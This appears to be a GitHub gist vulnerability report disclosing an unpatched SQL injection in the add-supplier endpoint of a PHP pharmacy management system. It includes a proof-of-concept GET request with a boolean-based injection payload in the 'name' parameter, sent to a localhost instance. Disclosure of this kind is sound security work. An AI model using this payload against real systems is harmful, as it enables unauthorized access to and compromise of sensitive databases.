Skip to content

Instantly share code, notes, and snippets.

@higordiego

higordiego/sqli_manager_add_supplier.md Secret

Created October 16, 2024 21:36
Show Gist options
  • Save higordiego/155be99b5314d97b276a7b30b9e6dec0 to your computer and use it in GitHub Desktop.
Save higordiego/155be99b5314d97b276a7b30b9e6dec0 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
sqli_manager_add_supplier.md

Affected Version:

  • Pharmacy Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection
  • Severity: CRITICAL
  • Status: Unpatched

Vulnerable Endpoint:

  • /php/add_new_supplier.php?name=aaaa&email=aa@contato.com.br&contact_number=1234567890&address=321321321321adsadsadsa%20%20dsadsadsa

Vulnerability Description:

A critical SQL injection vulnerability has been discovered in the Pharmacy Management System version 1.0, specifically in the add supplier functionality. This flaw occurs when user inputs, such as the name parameter, are not properly sanitized. Attackers can manipulate these inputs to inject and execute arbitrary SQL commands through a GET request to the endpoint /php/add_new_supplier.php.

If exploited, this vulnerability may allow unauthorized access to sensitive data, including supplier details, and disrupt operations. Given the absence of a patch, the issue represents a severe risk, demanding immediate remediation to prevent database compromise and information leakage.

Proof of Concept (PoC):

Below is an example of a GET request illustrating how the SQL injection vulnerability can be exploited by manipulating the name parameter:

GET /php/add_new_supplier.php?name=aaaa'%20AND%201087%3d1087%20AND%20'DBIs'%3d'DBIs%26email%3daa%40contato.com.br%26contact_number%3d1234567890%26address%3d321321321321adsadsadsa%20%20dsadsadsa HTTP/1.1
Host: localhost:8080
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
sec-ch-ua-mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/add_purchase.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive

Burp Suite Requests:

  • Burp Suite PoC

SQLMap Exploit:

  • SQLMap PoC

External Links:

This report demonstrates the potential exploitation of an SQL injection vulnerability in the add supplier functionality within the Pharmacy Management System. It provides detailed PoCs and practical examples to highlight the risks associated with improper input sanitization.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment